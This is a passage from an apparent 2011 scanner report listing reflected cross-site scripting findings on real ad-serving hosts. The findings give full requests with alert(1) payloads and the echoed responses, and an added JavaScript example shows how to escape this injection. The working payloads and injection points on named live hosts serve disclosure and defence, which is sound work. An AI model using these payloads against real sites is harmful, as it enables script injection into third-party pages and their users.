if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adverfe0cf<script>alert(1)</script>58e0387d345&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;
...[SNIP]...

6.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 65d60<script>alert(1)</script>95aa5c7e076 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480&t=7265d60<script>alert(1)</script>95aa5c7e076 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:49:53 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s1; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=7265d60<script>alert(1)</script>95aa5c7e076&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=new Reg
...[SNIP]...

6.10. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/6a.orbitcast/tech.general.ros/other

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c745b'-alert(1)-'4ace195dc06 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/6a.orbitcastc745b'-alert(1)-'4ace195dc06/tech.general.ros/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;ord=9400127232074738? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; targ=1; mmpg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 528
Date: Mon, 02 May 2011 14:58:50 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 14:58:50 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/6a.orbitcastc745b'-alert(1)-'4ace195dc06/tech.general.ros/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;net=6a;ord=9400127232074738;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(
...[SNIP]...

6.11. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/6a.orbitcast/tech.general.ros/other

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5855b'-alert(1)-'ab23faff340 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/6a.orbitcast/tech.general.ros5855b'-alert(1)-'ab23faff340/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;ord=9400127232074738? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; targ=1; mmpg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 528
Date: Mon, 02 May 2011 14:59:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 14:59:18 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros5855b'-alert(1)-'ab23faff340/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;net=6a;ord=9400127232074738;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.12. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/6a.orbitcast/tech.general.ros/other

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4910a'-alert(1)-'28bda3ed599 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/6a.orbitcast/tech.general.ros/other4910a'-alert(1)-'28bda3ed599;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;ord=9400127232074738? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; targ=1; mmpg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 528
Vary: Accept-Encoding
Date: Mon, 02 May 2011 14:59:33 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 14:59:33 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other4910a'-alert(1)-'28bda3ed599;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;net=6a;ord=9400127232074738;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.13. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [anx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/6a.orbitcast/tech.general.ros/other

Issue detail

The value of the anx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d284'-alert(1)-'03c000bc2e was submitted in the anx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/6a.orbitcast/tech.general.ros/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;ord=9400127232074738?6d284'-alert(1)-'03c000bc2e HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; targ=1; mmpg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 528
Date: Mon, 02 May 2011 14:57:45 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 14:57:45 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;net=6a;ord=9400127232074738?6d284'-alert(1)-'03c000bc2e;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.14. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/6a.orbitcast/tech.general.ros/other

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b379'-alert(1)-'7cb02ce77db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/6a.orbitcast/tech.general.ros/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;ord=9400127232074738?&8b379'-alert(1)-'7cb02ce77db=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; targ=1; mmpg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 532
Vary: Accept-Encoding
Date: Mon, 02 May 2011 14:58:17 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 14:58:17 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;net=6a;ord=9400127232074738?&8b379'-alert(1)-'7cb02ce77db=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
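The findings in this section all share one shape: a decoded piece of the request URL is concatenated into a single-quoted JavaScript string literal inside a `document.write(...)` call, and the scanner's canary `xxxxx'-alert(1)-'yyyyy` closes the literal, runs code, and reopens it. The following is an added example, not the ad server's own code: it models that builder, shows why the `'-...-'` canary leaves the script syntactically valid, and places a hardened builder beside it. The builder functions, the stub browser and the host name usage are assumptions made for illustration.

```javascript
// Added example, not the ad server's code: models the reflection seen in
// 6.14 above, where a request path segment is spliced unescaped into a
// single-quoted JS string literal inside document.write(...). The builder
// functions, the stub browser and the host name usage are assumptions made
// for illustration.

// The scanner's canary: close the literal, call alert(1), reopen it. The two
// halves are joined with '-' rather than ';' so the surrounding statement
// stays syntactically valid: 'a' - alert(1) - 'b' is a legal (NaN) expression.
const PAYLOAD = "8b379'-alert(1)-'7cb02ce77db";

// Vulnerable builder: the observed pattern, decoded path concatenated raw.
function buildLoaderVulnerable(pathSegment) {
  return (
    "var ifr = (self == top ? '' : 'env=ifr;');\n" +
    "document.write('<scr'+'ipt src=\"http://a.collective-media.net/cmadj/" +
    pathSegment +
    ";'+ifr+'\">');"
  );
}

// Inner context: the written string becomes HTML, and the value lands in an
// attribute, so encode it as an attribute value first.
function htmlAttrEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Outer context: the attribute text then sits inside a JS string literal, so
// escape anything that could end the literal or that JS treats as a line
// terminator (\u2028 and \u2029 included) as a \uXXXX sequence.
function jsStringEscape(s) {
  return s.replace(/[\\'"<>&\r\n\u2028\u2029]/g,
    c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Hardened builder: encode inner context first, outer context last.
function buildLoaderHardened(pathSegment) {
  return (
    "var ifr = (self == top ? '' : 'env=ifr;');\n" +
    "document.write('<scr'+'ipt src=\"http://a.collective-media.net/cmadj/" +
    jsStringEscape(htmlAttrEncode(pathSegment)) +
    ";'+ifr+'\">');"
  );
}

// Stand-in for the browser: run the generated loader with stub globals and
// record what alert() and document.write() were handed. A SyntaxError here
// means the injected text broke the script outright.
function runInStubBrowser(code) {
  const alerts = [];
  const written = [];
  const win = {};
  const loader = new Function('self', 'top', 'document', 'alert', code);
  loader(win, win, { write: s => { written.push(s); } }, x => { alerts.push(x); });
  return { alerts, written };
}

// Did the path segment escape the string literal and execute?
function escapesJsString(builder, pathSegment) {
  return runInStubBrowser(builder(pathSegment)).alerts.length > 0;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable, alert fired:', escapesJsString(buildLoaderVulnerable, PAYLOAD));
  console.log('hardened,   alert fired:', escapesJsString(buildLoaderHardened, PAYLOAD));
  console.log('hardened writes:', runInStubBrowser(buildLoaderHardened(PAYLOAD)).written[0]);
}
```

The hardened builder encodes twice on purpose: the value is first an HTML attribute (the text handed to `document.write` is parsed as markup) and only then a JavaScript string, so escaping just the quote character the scanner used would still let a `"` break the `src` attribute and a raw newline terminate the literal. Because these responses are script resources rather than HTML pages, the injected code runs in the origin of whichever document includes the crafted URL through a script tag, which is exactly how these ad tags are deployed.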

6.15. http://a.collective-media.net/adj/cm.guardian/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bbb5'-alert(1)-'5fcdaad9d48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.guardian2bbb5'-alert(1)-'5fcdaad9d48/;sz=728x90;ord=$random$? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22544-2.html?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; dc=dc; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 437
Vary: Accept-Encoding
Date: Mon, 02 May 2011 12:50:48 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 12:50:48 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.guardian2bbb5'-alert(1)-'5fcdaad9d48/;sz=728x90;net=cm;ord=$random$;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.16. http://a.collective-media.net/adj/cm.guardian/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2bbd'-alert(1)-'1d315ad8d9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.guardian/;sz=728x90;ord=$random$?&c2bbd'-alert(1)-'1d315ad8d9e=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22544-2.html?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; dc=dc; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 441
Vary: Accept-Encoding
Date: Mon, 02 May 2011 12:50:46 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 12:50:46 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.guardian/;sz=728x90;net=cm;ord=$random$?&c2bbd'-alert(1)-'1d315ad8d9e=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.17. http://a.collective-media.net/adj/cm.guardian/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fe83'-alert(1)-'af780e57a1c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.guardian/;sz=728x90;ord=$random$?9fe83'-alert(1)-'af780e57a1c HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22544-2.html?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; dc=dc; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 438
Vary: Accept-Encoding
Date: Mon, 02 May 2011 12:50:44 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 12:50:44 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.guardian/;sz=728x90;net=cm;ord=$random$?9fe83'-alert(1)-'af780e57a1c;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.18. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/6a.orbitcast/tech.general.ros/other

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f26dd'-alert(1)-'74c9b80dd6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadjf26dd'-alert(1)-'74c9b80dd6b/6a.orbitcast/tech.general.ros/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;net=6a;ord=9400127232074738;ord1=7385;cmpgurl=http%253A//www.orbitcast.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; targ=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 02 May 2011 14:59:34 GMT
Connection: close
Content-Length: 7428

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("6a-57634638_1304348374","http://ad.doubleclick.net/adjf26dd'-alert(1)-'74c9b80dd6b/6a.orbitcast/tech.general.ros/other;net=6a;u=,6a-57634638_1304348374,11f8f328940989e,ce,am.h-am.b-dx.16-dx.23-dx.17-cm.ent_m-cm.music_h;;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;cmw
...[SNIP]...

6.19. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/6a.orbitcast/tech.general.ros/other

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee8db'-alert(1)-'c950acb7221 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/6a.orbitcastee8db'-alert(1)-'c950acb7221/tech.general.ros/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;net=6a;ord=9400127232074738;ord1=7385;cmpgurl=http%253A//www.orbitcast.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; targ=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 02 May 2011 15:00:00 GMT
Connection: close
Content-Length: 7428

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("6a-13048608_1304348400","http://ad.doubleclick.net/adj/6a.orbitcastee8db'-alert(1)-'c950acb7221/tech.general.ros/other;net=6a;u=,6a-13048608_1304348400,11f8f328940989e,ce,am.h-am.b-dx.16-dx.23-dx.17-cm.ent_m-cm.music_h;;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;cmw=owl;sz=728x9
...[SNIP]...

6.20. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/6a.orbitcast/tech.general.ros/other

Issue detail

